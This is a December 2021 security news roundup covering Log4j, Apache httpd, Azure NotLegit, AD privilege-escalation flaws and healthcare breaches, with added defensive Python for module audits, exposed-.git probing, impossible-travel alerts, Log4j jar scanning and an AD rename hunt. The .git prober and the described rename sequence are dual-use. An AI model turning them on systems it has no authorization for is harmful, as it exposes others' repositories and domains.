Cybersecurity News Headlines Update on December 29, 2021

Joint Log4j Cybersecurity Advisory

Attackers are “actively scanning networks to potentially exploit” Log4j vulnerabilities, according to a joint advisory issued by cybersecurity organizations from the US, the UK, Canada, Australia, and New Zealand. The advisory offers technical details, mitigations, and additional resources.

Note

  • At this point, the importance of mitigating the log4j vulnerability should be evident without this advisory. But the advisory is still useful, particularly in that it includes tools to assist in finding vulnerable log4j instances.
  • This alert consolidates information you need to know to deal with Log4j. The primary mitigation remains upgrading it where used, which means you need a current application inventory and corresponding monitoring. If you have outsourced or cloud services which haven’t let you know if or how Log4j applies to their environment, actively reach out to them for information. Did you remember to check out your ICS/OT systems for issues? If you are providing services to others, make sure you’re informing them on your actions and any actions they may need to take. Leverage the resources in the bulletin for reporting, IOCs or even if you need help getting your arms around this.

Read more in

Apache HTTPD Server Vulnerabilities

Apache has released Apache HTTP Server 2.4.52 to address two vulnerabilities. The first (CVE-2021-44790) is a possible buffer overflow when parsing multipart content in mod_lua; the second (CVE-2021-44224) is a possible NULL dereference or SSRF in forward proxy configurations. Both affect Apache HTTP Server 2.4.51 and earlier.

Note

  • Of the two vulnerabilities, the one in mod_lua is far more serious since it could in theory result in code execution. But there are two big lessons here. First, in every distro I checked, mod_lua was compiled with security features that make exploitation far harder and less likely. Second, there’s an attack surface lesson here. Very few organizations use mod_lua in Apache, yet it is enabled by default in many Linux distributions. Minimizing attack surface is foundational to security but unfortunately many distributions are expanding attack surface for the sake of compatibility. Security professionals shouldn’t just “apt install” and presume everything is optimally secure. Instead, review configurations to ensure that package maintainers haven’t added extras you don’t need.
  • Just over 31% of public facing web servers run the Apache HTTP server. If you’re using the default httpd from your Linux distribution, make sure that you’re on a patched version, or manually install/configure the current version. If you want to stay with the built-in version and it’s running behind, you may need to update to a newer distribution.
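The configuration review the note above recommends can be scripted. The following is an added example, not code from the page or from the Apache project: it parses the active LoadModule directives (or the output of apachectl -M, which also lists statically compiled modules that no LoadModule line reveals) against an allowlist of modules the site actually needs, and separately flags mod_lua and ProxyRequests On because those are the configurations the two 2.4.52 fixes apply to. The allowlist, the sample configuration and the sample apachectl output are constructed for illustration.

```python
"""Audit an Apache httpd configuration for modules you do not need and for
forward-proxy exposure. Added example, not from the page or the Apache project.
The configuration text and the apachectl output below are constructed."""
import re

# Modules a plain TLS reverse proxy actually needs, plus the static core ones.
# Assumption: this allowlist is illustrative; build yours from what the site uses.
ALLOWED_MODULES = {
    "core", "so", "http", "unixd", "mpm_event", "authz_core", "dir", "mime",
    "log_config", "ssl", "headers", "rewrite", "proxy", "proxy_http",
}

# '^\s*' anchors on the directive, so commented-out lines ('#LoadModule ...') never match.
LOADMODULE_RE = re.compile(r"^\s*LoadModule\s+(\w+?)_module\s+\S+", re.MULTILINE)
PROXYREQUESTS_RE = re.compile(r"^\s*ProxyRequests\s+(\w+)", re.MULTILINE | re.IGNORECASE)
# 'apachectl -M' prints one module per line: ' lua_module (shared)' or ' core_module (static)'.
APACHECTL_RE = re.compile(r"^\s*(\w+?)_module\s+\((static|shared)\)", re.MULTILINE)

# Constructed sample, loosely shaped like a distribution default.
SAMPLE_CONFIG = """\
LoadModule mpm_event_module modules/mod_mpm_event.so
LoadModule authz_core_module modules/mod_authz_core.so
LoadModule dir_module modules/mod_dir.so
LoadModule mime_module modules/mod_mime.so
LoadModule log_config_module modules/mod_log_config.so
LoadModule lua_module modules/mod_lua.so
LoadModule proxy_module modules/mod_proxy.so
LoadModule proxy_http_module modules/mod_proxy_http.so
#LoadModule cgi_module modules/mod_cgi.so
<IfModule proxy_module>
    ProxyRequests On
</IfModule>
"""

# Constructed 'apachectl -M' output from a host with two extra shared modules.
SAMPLE_APACHECTL = """\
Loaded Modules:
 core_module (static)
 so_module (static)
 http_module (static)
 mpm_event_module (shared)
 lua_module (shared)
 cgid_module (shared)
"""


def loaded_modules(config_text):
    """Module short names from every active LoadModule directive, in file order."""
    return [m.group(1) for m in LOADMODULE_RE.finditer(config_text)]


def modules_from_apachectl(output):
    """Module short names from 'apachectl -M' output, static modules included."""
    return [m.group(1) for m in APACHECTL_RE.finditer(output)]


def audit(modules, config_text="", allowed=ALLOWED_MODULES):
    """Return findings for a module list and, optionally, the configuration text."""
    findings = []
    for name in modules:
        if name not in allowed:
            findings.append(f"unexpected module loaded: mod_{name}")
    if "lua" in modules:
        findings.append("mod_lua is loaded: CVE-2021-44790 (multipart parsing overflow) "
                        "affects it in 2.4.51 and earlier; unload it unless something needs it")
    for m in PROXYREQUESTS_RE.finditer(config_text):
        if m.group(1).lower() == "on":
            findings.append("ProxyRequests On: forward proxying is enabled, which is the "
                            "configuration CVE-2021-44224 applies to in 2.4.51 and earlier")
    return findings


def demo():
    """Run both audits over the constructed samples, keyed by data source."""
    return {
        "config": audit(loaded_modules(SAMPLE_CONFIG), SAMPLE_CONFIG),
        "apachectl": audit(modules_from_apachectl(SAMPLE_APACHECTL)),
    }


if __name__ == "__main__":
    for source, findings in demo().items():
        print(source)
        for finding in findings:
            print("  -", finding)
```

On a live host, feed the output of apachectl -M to modules_from_apachectl() and the concatenated configuration to audit(); on Debian-derived systems a2dismod lua unloads the module, elsewhere comment out the LoadModule line and restart httpd. Treat the allowlist as a starting point: the point of the exercise is that every loaded module becomes a deliberate decision rather than a packaging default.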

Read more in

Azure App Service Vulnerability

Microsoft has disclosed a vulnerability in its Azure App Service for Linux. The flaw could be exploited to download files that were not intended to be public. Microsoft learned of the vulnerability from researchers at Wiz. Known as the NotLegit bug, the vulnerability has existed since September 2017. In a blog post, Microsoft writes that they have “updated all PHP images to disallow serving the .git folder as static content as a defense in depth measure.” They have also notified affected customers and updated documentation as appropriate.

Note

  • While most cloud services security incidents are enabled by admin error, this is a good reminder that vulnerabilities continue to be found in cloud services like Azure, AWS, GCP and others. File integrity and data movement monitoring is still required for business-critical executables, files and data.
  • Exposed .git directories are a common issue and they should show up in web application vulnerability scans. It also remains one of the top vulnerabilities probed in our honeypots. A little bit odd that it took so long to discover this issue.
  • If you set up a “Local Git” repository for your content delivered using the Azure App Service, those repositories were public, not private, because the config file (web.config) in the .git folder was only processed by their IIS server, not Apache or other technologies used. Microsoft resolved the issue November 17th, and started notifying affected customers via email December 7th. If you were using this service, make sure that your deployed code is as expected, particularly any included authentication information such as API keys which may warrant updates.
  • This is not the first high-profile cloud platform vulnerability discovered and reported by Wiz and it certainly won’t be the last. If your org uses cloud platforms, you should be following Wiz for early notifications of vulnerabilities.
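An exposed .git directory is easy to check for from the outside, which is why it belongs in routine web scanning. As an added example (not from the page, Microsoft or Wiz), the checker below requests /.git/HEAD and /.git/config under a site and accepts a hit only when the body looks like real repository content, so applications that answer 200 with a friendly “not found” page do not produce false positives. The stub fetchers return constructed responses so the logic can be exercised offline; the base URL in the usage note is a placeholder.

```python
"""Probe a web origin for a .git directory served as static content, the class of
exposure behind NotLegit. Added example, not from the page, Microsoft or Wiz.
The live fetcher uses urllib; the stub fetchers return constructed responses."""
import urllib.error
import urllib.request


def looks_like_git_head(body):
    """A real .git/HEAD is 'ref: refs/heads/<branch>' or, when detached, a 40-hex commit id."""
    body = body.strip()
    if body.startswith("ref: refs/heads/"):
        return True
    return len(body) == 40 and all(c in "0123456789abcdef" for c in body)


def looks_like_git_config(body):
    return "[core]" in body and "repositoryformatversion" in body


# Path -> content test. Matching on content rather than on HTTP 200 alone avoids
# false positives from apps that return 200 with a 'not found' page for every path.
PROBES = {
    "/.git/HEAD": looks_like_git_head,
    "/.git/config": looks_like_git_config,
}


def http_fetch(url, timeout=5):
    """GET url and return (status, body); status is None when the host is unreachable."""
    req = urllib.request.Request(url, headers={"User-Agent": "git-exposure-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read(4096).decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, ""
    except (urllib.error.URLError, OSError):
        return None, ""


def check_git_exposure(base_url, fetch=http_fetch):
    """Return the .git paths that are served with plausible repository content."""
    base = base_url.rstrip("/")
    exposed = []
    for path, accept in PROBES.items():
        status, body = fetch(base + path)
        if status == 200 and accept(body):
            exposed.append(path)
    return exposed


def stub_exposed(url):
    """Constructed responses from a server that hands out .git as static files."""
    if url.endswith("/.git/HEAD"):
        return 200, "ref: refs/heads/master\n"
    if url.endswith("/.git/config"):
        return 200, "[core]\n\trepositoryformatversion = 0\n\tbare = false\n"
    return 404, ""


def stub_soft_404(url):
    """Constructed responses from an app that answers 200 for unknown paths."""
    return 200, "<html><body><h1>Page not found</h1></body></html>"


if __name__ == "__main__":
    print("exposed server:", check_git_exposure("https://app.example", stub_exposed))
    print("soft-404 server:", check_git_exposure("https://app.example", stub_soft_404))
```

check_git_exposure("https://app.example") with the default fetcher runs the check live. A hit means the entire history is retrievable, including every secret that was ever committed, so the response is to rotate those credentials, not only to block the path.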

Read more in

Cyberspace Solarium Commission Will Become a Non-Profit

The Cyberspace Solarium Commission has reached the end of its term as designated in the 2019 National Defense Authorization Act (NDAA). Dozens of the commission’s recommendations have become law, including establishing the post of National Cyber Director. Leaders of the commission plan to convert it to a non-profit organization.

Note

  • Since 2019, the commission has seen 40 of their suggested measures codified into law. The move to a non-profit “think tank” changes the reporting relationship with lawmakers and they will have to use existing relationships as well as build a new working model to get more legislation on the docket. It is expected they will continue the push to get mandatory incident reporting passed next.

Read more in

Log4j Scanners

The Cybersecurity and Infrastructure Security Agency (CISA) has released Log4j-scanner, “a project derived from other members of the open-source community by CISA to help organizations identify potentially vulnerable web services affected by log4j vulnerabilities.” Other organizations and researchers have published Log4j scanners as well.

Note

  • If you don’t have a scanner, or cannot afford one, this is what you need. You can also use this to cross-check the results from your current scanner. Note that you need to take additional steps, such as configuring your own DNS server, to check for some of the weaknesses. Make sure you don’t miss your non-internet facing systems. The current drawbridge/moat (aka perimeter firewall) model is not the barrier it once was.

Read more in

More Healthcare Organization Breaches

West Virginia’s Monongalia Health System and Florida’s BioPlus Specialty Pharmacy Services LLC have experienced cybersecurity incidents. A phishing attack against Monongalia Health System in late October compromised the protected health information (PHI) of nearly 400,000 people. BioPlus reported a server hacking incident earlier this month that affected the PHI of 350,000 people. Both incidents have been added to the US Department of Health and Human Services HIPAA Breach Reporting Tool website.

Note

  • Make sure that you terminate or otherwise deactivate inactive, defunct, or terminated user accounts, including email. Enable monitoring including “impossible access” detection. (E.g., connecting from the U.S. and abroad within a window shorter than the travel time.) Make sure that you can also detect anomalous behavior on your networks and services to include data exfiltration activities. For outsourced or cloud services have a serious conversation about what is possible. Make sure the incident response information is current and all parties know those contacts/exchanges are legitimate.
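The “impossible access” check in the note above is a short piece of logic once sign-in events carry a geolocated source address. The example below is added here and is not from the page: it walks each user’s successful sign-ins in time order, computes the great-circle distance between consecutive source locations, and flags any pair whose implied speed exceeds a threshold. The log lines, the IP-to-location table and the 1,000 km/h threshold are constructed assumptions; the addresses come from the RFC 5737 documentation ranges, and in production the table would be a GeoIP lookup.

```python
"""'Impossible travel' detection over authentication log lines. Added example, not
from the page. The log lines and the IP-to-location table are constructed."""
from datetime import datetime
from math import asin, cos, radians, sin, sqrt

EARTH_RADIUS_KM = 6371.0
MAX_PLAUSIBLE_KMH = 1000.0  # above any airliner's cruise speed, so real flights never trigger

# Constructed stand-in for a GeoIP database: ip -> (country, lat, lon).
GEO = {
    "203.0.113.10": ("US", 40.71, -74.01),   # New York
    "198.51.100.7": ("US", 34.05, -118.24),  # Los Angeles
    "192.0.2.55":   ("RO", 44.43, 26.10),    # Bucharest
}

# Constructed sign-in log, one event per line.
LOG_LINES = """\
2021-12-20T08:02:11Z user=alice ip=203.0.113.10 result=success
2021-12-20T08:41:50Z user=alice ip=192.0.2.55 result=success
2021-12-20T09:00:00Z user=bob ip=203.0.113.10 result=success
2021-12-20T17:30:00Z user=bob ip=198.51.100.7 result=success
2021-12-20T12:00:00Z user=carol ip=192.0.2.55 result=failure
2021-12-20T12:05:00Z user=carol ip=203.0.113.10 result=success
""".splitlines()


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance between two points given in decimal degrees."""
    p1, p2 = radians(lat1), radians(lat2)
    dlat, dlon = p2 - p1, radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(p1) * cos(p2) * sin(dlon / 2) ** 2
    return 2 * EARTH_RADIUS_KM * asin(sqrt(a))


def parse_line(line):
    """'<iso-time> key=value ...' -> dict with a datetime and typed fields."""
    stamp, rest = line.split(" ", 1)
    fields = dict(kv.split("=", 1) for kv in rest.split())
    return {
        "ts": datetime.strptime(stamp, "%Y-%m-%dT%H:%M:%SZ"),
        "user": fields["user"],
        "ip": fields["ip"],
        "ok": fields["result"] == "success",
    }


def impossible_travel(lines, geo=GEO, max_kmh=MAX_PLAUSIBLE_KMH):
    """Return (user, from_ip, to_ip, km, hours, kmh) for each pair of consecutive
    successful sign-ins by one user that implies travel faster than max_kmh.
    Only successes count: a failed attempt from abroad is spraying or stuffing,
    which deserves its own alert, not evidence that the user moved."""
    events = sorted((parse_line(l) for l in lines), key=lambda e: (e["user"], e["ts"]))
    last_seen = {}
    hits = []
    for e in events:
        if not e["ok"] or e["ip"] not in geo:
            continue
        prev = last_seen.get(e["user"])
        if prev is not None and prev["ip"] != e["ip"]:
            _, lat1, lon1 = geo[prev["ip"]]
            _, lat2, lon2 = geo[e["ip"]]
            km = haversine_km(lat1, lon1, lat2, lon2)
            # floor the interval at one second so two sign-ins in the same second do not divide by zero
            hours = max((e["ts"] - prev["ts"]).total_seconds() / 3600, 1 / 3600)
            kmh = km / hours
            if kmh > max_kmh:
                hits.append((e["user"], prev["ip"], e["ip"], round(km), round(hours, 2), round(kmh)))
        last_seen[e["user"]] = e
    return hits


if __name__ == "__main__":
    for hit in impossible_travel(LOG_LINES):
        print("impossible travel: user=%s %s -> %s, %d km in %.2f h (%d km/h)" % hit)
```

Two design choices are worth keeping when you port this to your SIEM: only successful sign-ins are compared, because failed attempts say nothing about where the user is, and the threshold sits above airliner speed so legitimate travel is never flagged. VPN egress points and cloud-hosted proxies still produce hits, so suppress known corporate egress addresses before alerting.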

Read more in

Ransomware Attacks are Targeting QNAP NAS Devices

Ransomware operators are reportedly targeting QNAP network-attached storage (NAS) devices with the eChoraix malware. The attacks began to intensify in mid-December. It is not clear how the attackers gained access to the devices. Some users admitted that they had not adequately secured their NAS devices; others say that they were breached through a vulnerability in QNAP Photo Station.

Note

  • Remember: Never never never expose a network storage device to the internet.
  • Yes, it’s really cool to have your home storage available over the Internet; however, home NAS devices have repeatedly been found to be not up to the task. Use cloud file sharing solutions which are engineered to stand up on the Internet with strong authentication. This can also make it much easier to share files/collaborate externally securely. If you’re continuing with your current NAS devices, review the accounts regularly, keep them patched, and remove any unused or unknown applications.

Read more in

Problematic Dell BIOS Update

Recent Dell BIOS updates have reportedly been preventing laptops and desktops from booting. The affected BIOS versions are 1.14.3 for Latitude laptops, 2.8.0 for Inspiron, and 1.0.18 for Aurora R8. Dell has not yet released updated versions; users can downgrade to a previous firmware version until the updates are available.

Note

  • The trick here is that you needed not only to regression test this update, but also to test it with connected peripherals to see issues. If you pushed this out, you’ll want to roll back to version 1.13.0, which requires a bit of luck as the laptop has to be stable enough to complete the downgrade. Dell has published guidance on downgrading the BIOS. www.dell.com: Downgrading the System BIOS on a Dell System

Read more in

Fresenius Kabi Releases Updates to Address Vulnerabilities in Infusion Systems

The US Cybersecurity and Infrastructure Security Agency (CISA) has issued an ICS Medical Advisory warning of multiple vulnerabilities in Fresenius Kabi Agilia Connect Infusion Systems. The flaws could be exploited to access data, modify device settings, or perform arbitrary actions as an authenticated user. Fresenius has released updated versions of the vulnerable components.

Note

  • Look through the list of vulnerabilities and ask if you’ve made any of those same mistakes in your software engineering processes and fix them if you have. Fresenius Kabi has been communicating on this topic; make sure you’ve got the updates installed. Note that if you have an early Link+, you’ll need a hardware update to support the new firmware; contact Fresenius Kabi directly for assistance and follow the mitigations in the CISA bulletin.

Read more in

And Another (Third) Log4J Issue

Apache has once again updated Log4j, this time to version 2.17.0. The newest version of the logging library fixes a high-severity denial-of-service issue, CVE-2021-45105. The vulnerability affects all versions of Log4j from 2.0-beta9 through 2.16.0. Last week, the US Cybersecurity and Infrastructure Security Agency (CISA) directed federal agencies to patch systems or apply mitigations by Friday, December 24.

Note

  • As of this week, if you run Java 8, log4j 2.17.0 is the latest version fixing all known issues. For Java 7, log4j 2.12.2 should be used. As mentioned before: Keep good notes. You will have to do this again in the near future. log4j 2.15 fixes most issues, and the vulnerabilities in 2.15/16 are only exploitable if the logging configuration uses a non-default pattern layout with a context lookup. If there are critical systems still running log4j < 2.15: Patch them first before you redo the systems already at 2.15.
  • This is an infinite recursion bug. Essentially the function keeps being called until the host runs out of resources. I’m having flashbacks to recursive programming in college, and these are a bugger. You can either deploy Log4j 2.17, or you can change your code. The choices are to replace context lookups with thread context map patterns or remove context lookups where they originate from sources external to the application. Hint: deploy Log4j 2.17.
  • As more focus is given to log4j, we expect other vulnerabilities to surface. Now that you have an inventory and understanding of your attack surface as it relates to log4j, apply the patches in a cadence that matches your threat model and risk appetite.
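The notes above, and the Log4j Scanners item earlier, assume you can find every copy of log4j-core and tell which release each one is; CISA’s scanner covers web services from the outside, which leaves the copies bundled inside application archives on disk. The example below is added here and is neither CISA’s scanner nor Apache code: it walks a directory, opens every jar/war/ear (recursing into nested archives in memory), reads the log4j-core version from its Maven pom.properties, checks whether JndiLookup.class is still present, and classifies each find. The fixed-version thresholds default to 2.17.0 for Java 8 and 2.12.3 for the Java 7 branch (the release after 2.12.2 that carries the same denial-of-service fix) and are parameters you should set from the current Apache advisory; the sample archives are constructed in a temporary directory by build_sample_jar().

```python
"""Local filesystem scan for log4j-core, including copies nested inside war/ear
files, classified against the fixed versions. Added example: not CISA's
log4j-scanner and not Apache code. Sample archives are constructed in a temp dir."""
import io
import os
import tempfile
import zipfile

JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_EXT = (".jar", ".war", ".ear")

# Lowest release per branch with the fixes for CVE-2021-44228, -45046 and -45105:
# 2.17.0 (Java 8) and 2.12.3 (Java 7; 2.12.2 lacks the DoS fix). The 2.3.x Java 6
# branch is not modelled. Assumption: set these from the Apache security page.
FIXED = {"java8": (2, 17, 0), "java7": (2, 12, 3)}


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0), which sorts below every release."""
    parts = []
    for piece in text.split("-")[0].split("."):
        digits = "".join(ch for ch in piece if ch.isdigit())
        parts.append(int(digits) if digits else 0)
    return tuple((parts + [0, 0, 0])[:3])


def is_fixed(version, fixed=FIXED):
    v = parse_version(version)
    return v >= fixed["java7"] if v[:2] == (2, 12) else v >= fixed["java8"]


def inspect_archive(data, label):
    """Yield (label, version, has_jndi_lookup) for each log4j-core in the archive
    bytes, descending into nested archives without extracting them to disk."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return
    with zf:
        names = zf.namelist()
        version = None
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        has_jndi = JNDI_LOOKUP in names
        if version is not None or has_jndi:
            yield label, version, has_jndi
        for inner in names:
            if inner.lower().endswith(ARCHIVE_EXT):
                yield from inspect_archive(zf.read(inner), label + "!" + inner)


def classify(version, has_jndi, fixed=FIXED):
    if version is not None and is_fixed(version, fixed):
        return "fixed"
    if not has_jndi:
        return "mitigated-jndilookup-removed"  # the documented class-removal workaround
    return "vulnerable" if version is not None else "unknown-version"


def scan_path(root, fixed=FIXED):
    """Walk root and return one record per log4j-core copy found."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(ARCHIVE_EXT):
                full = os.path.join(dirpath, name)
                with open(full, "rb") as fh:
                    data = fh.read()
                for label, version, has_jndi in inspect_archive(data, full):
                    findings.append({"path": label, "version": version,
                                     "status": classify(version, has_jndi, fixed)})
    return findings


def build_sample_jar(path, version, include_jndi=True, wrap_in_war=False):
    """Write a constructed stand-in for log4j-core-<version>.jar holding only the
    two entries the scanner keys on, optionally nested under WEB-INF/lib of a war."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
        if include_jndi:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only
    data = buf.getvalue()
    if wrap_in_war:
        outer = io.BytesIO()
        with zipfile.ZipFile(outer, "w") as war:
            war.writestr(f"WEB-INF/lib/log4j-core-{version}.jar", data)
        data = outer.getvalue()
    with open(path, "wb") as fh:
        fh.write(data)


def demo():
    """Build four sample archives, scan them, and return {archive name: status}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_jar(os.path.join(tmp, "log4j-core-2.14.1.jar"), "2.14.1")
        build_sample_jar(os.path.join(tmp, "app.war"), "2.15.0", wrap_in_war=True)
        build_sample_jar(os.path.join(tmp, "log4j-core-2.17.0.jar"), "2.17.0")
        build_sample_jar(os.path.join(tmp, "stripped-2.10.0.jar"), "2.10.0", include_jndi=False)
        return {os.path.basename(f["path"].split("!")[0]): f["status"] for f in scan_path(tmp)}
```

scan_path("/opt/app") on a real tree returns one record per copy found, with nested copies labelled as outer!inner. A "mitigated-jndilookup-removed" result means someone applied the class-removal workaround and the jar still needs a proper upgrade once the vendor supports it. Keep the output with your notes: it is the inventory the next log4j advisory will be checked against.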

Read more in

HHS Urges Healthcare Orgs to Address Log4j Vulnerabilities

The US Department of Health and Human Services (HHS) is urging organizations within the healthcare sector to prioritize addressing the Log4j vulnerabilities. The HHS 405(d) program Situation, Background, Assessment, Recommendation (SBAR) brief notes that the available “patch may not supply a fix for all organizations because of legacy systems that may be present in their network.”

Note

  • Healthcare remains a primary target, as is any sector perceived as over loaded and under-resourced. Spin up a team to review your security posture, include outsiders to avoid overlooking issues you’re desensitized to. Verify your monitoring is covering current and legacy systems. Make sure that your segmentation not only protects components from the primary network, but also protects the network from them.

Read more in

ICS Security Company Helps Firm Recover From Cyberattack on Building Automation System

An industrial control systems security firm, Limes Security, was brought in to help an automation engineering company deal with a major attack against a Building Automation System (BAS) that controlled light switches, motion detectors, and other devices. Limes Security helped the engineering company regain control of the compromised components, and has since learned of similar attacks against BAS built on KNX technology.

Note

  • Do you have resources identified to help recover from an attack like this when it happens, or do you still have an action item for someone to find a resource after the last tabletop? If you have a resource, have you had them participate in your recovery exercise to make sure the vision and reality align? Lastly, find out if they have assessment and/or best practices options you can leverage to raise the security bar.
  • Interesting case of not only a well-documented attack against building automation systems, but also a security feature used to achieve a DoS attack.

Read more in

Microsoft Urges Users to Apply Fixes for Active Directory Security Issues

In November, Microsoft released fixes for two Windows Active Directory domain service privilege escalation vulnerabilities, CVE-2021-42278 and CVE-2021-42287. Earlier this month, a proof-of-concept exploit for the flaws was released. When exploited together, the flaws allow attackers to take control of vulnerable Windows domains. Microsoft’s guidance includes a “step by step guide to identify potential compromised computers via Advanced Hunting query.”

Note

  • For many organizations, the last week of December brings reduced user and customer traffic and a good chance for longer change windows. If you have that opportunity, it’s a good idea to take advantage and make sure all those Windows servers have all those critical Windows patches that have come out in the last few months. If there is resistance, following Microsoft threat hunting guidance first may prove to be a good way to gain backing for doing so.
  • The bulletin includes the specific events related to exploiting those vulnerabilities. Use the information to verify you’re in good shape. Also, after you apply the fixes to your domain controllers, have a serious conversation about making sure that is all those systems do, that you’re using application allow/deny lists to prevent execution of any “extra” software. Make sure that your Domain Admin accounts require MFA, particularly your Enterprise Admin.
  • These vulnerabilities may have flown under the radar with all the focus on log4j. A compromised Active Directory can lead to the entire organization being compromised. Highly recommend applying these fixes and hunting for indicators of adversary behaviors.
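The events the bulletin points at centre on a machine account, whose sAMAccountName normally ends in “$”, being renamed to a name without it. The hunt below is an added example, not Microsoft’s Advanced Hunting query: it runs over constructed account-creation and account-change records, follows each newly created account through its renames, and alerts on a dropped “$”, a new name that collides with a domain controller, or a rename shortly after creation. The field names are this example’s own schema (you would fill them from Security event 4741/4742 exports or your identity-protection product’s account-change records); the DC list and the 15-minute window are assumptions.

```python
"""Hunt for the machine-account renaming pattern used against CVE-2021-42278 and
CVE-2021-42287 over exported directory-change events. Added example, not
Microsoft's hunting query. The events and the field schema are constructed."""
from datetime import datetime

# Assumption: your domain controllers' account names, without the trailing '$'.
DOMAIN_CONTROLLERS = {"DC01", "DC02"}

# Constructed timeline: a low-privileged user creates a machine account, renames it
# to collide with a DC's name, and renames it back afterwards. The final event is a
# routine rename by an admin tool and must not alert.
EVENTS = [
    {"time": "2021-12-20T10:00:00", "id": 4741, "target": "WKS-LAB42$", "subject": "CORP\\jdoe"},
    {"time": "2021-12-20T10:00:05", "id": 4742, "target": "WKS-LAB42$",
     "old_sam": "WKS-LAB42$", "new_sam": "DC01", "subject": "CORP\\jdoe"},
    {"time": "2021-12-20T10:00:09", "id": 4742, "target": "DC01",
     "old_sam": "DC01", "new_sam": "WKS-LAB42$", "subject": "CORP\\jdoe"},
    {"time": "2021-12-20T11:15:00", "id": 4742, "target": "FILESRV07$",
     "old_sam": "FILESRV07$", "new_sam": "FILESRV08$", "subject": "CORP\\svc-sccm"},
]


def _ts(text):
    return datetime.strptime(text, "%Y-%m-%dT%H:%M:%S")


def _bare(sam):
    """Account name without the machine-account '$', upper-cased for comparison."""
    return sam.rstrip("$").upper()


def hunt(events, dcs=DOMAIN_CONTROLLERS, window_s=900):
    """Return one alert per 4742 rename matching any of three indicators: a machine
    account losing its trailing '$', a new name colliding with a DC, or a rename
    within window_s seconds of the account's creation (4741). Newly created accounts
    are followed through renames so the clean-up rename is caught as well."""
    created = {}   # current sAMAccountName -> (creation time, creator)
    alerts = []
    for e in sorted(events, key=lambda ev: ev["time"]):
        if e["id"] == 4741:
            created[e["target"]] = (_ts(e["time"]), e["subject"])
            continue
        if e["id"] != 4742:
            continue
        old, new = e["old_sam"], e["new_sam"]
        reasons = []
        if old.endswith("$") and not new.endswith("$"):
            reasons.append("machine account renamed to a name without a trailing '$'")
        if _bare(new) in dcs and _bare(old) != _bare(new):
            reasons.append(f"new sAMAccountName collides with domain controller {_bare(new)}")
        if old in created:
            born, creator = created.pop(old)
            created[new] = (born, creator)   # keep following the account under its new name
            age = int((_ts(e["time"]) - born).total_seconds())
            if age <= window_s:
                reasons.append(f"renamed {age}s after creation by {creator}")
        if reasons:
            alerts.append({"time": e["time"], "subject": e["subject"],
                           "old": old, "new": new, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in hunt(EVENTS):
        print(alert["time"], alert["subject"], alert["old"], "->", alert["new"])
        for reason in alert["reasons"]:
            print("   ", reason)
```

Run against real exports, the first indicator alone is noisy in some environments (service-account tooling occasionally renames machine accounts), so weight the DC-collision and created-then-renamed indicators higher, and pair the hunt with the patch: once KB5008102 hardening is enforced, the rename to a name without “$” is refused by the domain controller itself.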

Read more in

Belgian Defense Ministry Networks Breached Through Log4J Vulnerability

Belgium’s Ministry of Defense says that its networks were breached through exploitation of the Log4J vulnerability. The Defense Ministry deployed “quarantine measures” to help prevent the attack from spreading. Portions of the Ministry’s network have been unavailable since Thursday, December 16.

Note

  • We have not seen a lot of reports of actual breaches caused by log4j. A lot of exploit attempts, but most of them just spray the exploit without much consideration if the exploit will actually work. This smoke screen of exploit attempts may cover up some of the more dangerous attempts.
  • Risks like this can be reduced with a properly configured WAF and appropriate monitoring to detect maleficence. Look at this as a long-term strategy, not just appropriate for Log4j. While disabling Log4j is an option, the operational impact risk is high, suggest not choosing this approach.

Read more in

FBI Warning: APT Actors Exploiting Zoho ManageEngine Vulnerability

In a December 17 TLP: White Flash bulletin, the FBI warned that “APT actors have been actively exploiting a zero-day, now identified as CVE-2021-44515, on ManageEngine Desktop Central servers.” ManageEngine parent company Zoho released a security advisory for the issue earlier this month. The Flash includes technical details, indicators of compromise, and recommended mitigations.

Note

  • The fix is to upgrade to the fixed versions now. The FBI/IC3 bulletin includes indicators and actions to take to ensure you’re not compromised as well as Yara rules to aid detection. As this is being actively exploited, don’t wait to find out the hard way that you’re compromised.

Read more in

Western Digital Urges Customers to Upgrade to My Cloud OS 5

Data storage company Western Digital is urging customers who own MyCloud devices to upgrade to My Cloud OS 5. As of January 15, 2022, “devices that are compatible with My Cloud OS 5 will no longer support prior generations of the My Cloud OS, including My Cloud OS 3.” As of April 15, 2022, Western Digital is discontinuing support for older generations of My Cloud OS. This means that users with devices incompatible with MyCloud OS 5 will no longer be able to access those devices remotely.

Note

  • Keep an eye on lifecycle, particularly on SOHO focused products. If updates are no longer available, prioritize replacing the device. As Internet accessible NAS remains a target, don’t expose it, in any fashion, to the Internet. If you want external access to your content, consider using a mainstream cloud service (Google, Microsoft, Box, etc.) which are engineered and secured for this type of access. The cost difference will be far less than an incident.

Read more in

Avast: US Federal Government Entity Network Breached

Researchers from Avast detected a cyberattack against the internal network of “a small, lesser-known U.S. federal government commission associated with international rights.” The Avast report says they reached out to the organization but after initial contact, the organization has not responded. While Avast does not have information about how the incident affected the organization or steps the organization took to mitigate the event, “based on [Avast’s] analysis of the files in question, … it’s reasonable to conclude that the attackers were able to intercept and possibly exfiltrate all local network traffic in this organization.”

Note

  • Make sure that you have published security contacts for reporting of discoveries such as this. Additionally, respond to and validate the reports, acting where needed. The last thing you want is public disclosure of weaknesses. Security through obscurity is still not a viable approach. In general US Agencies are bound by BOD 20-01 to develop and publish a vulnerability disclosure policy.

Read more in

Healthcare Sector Breach Roundup

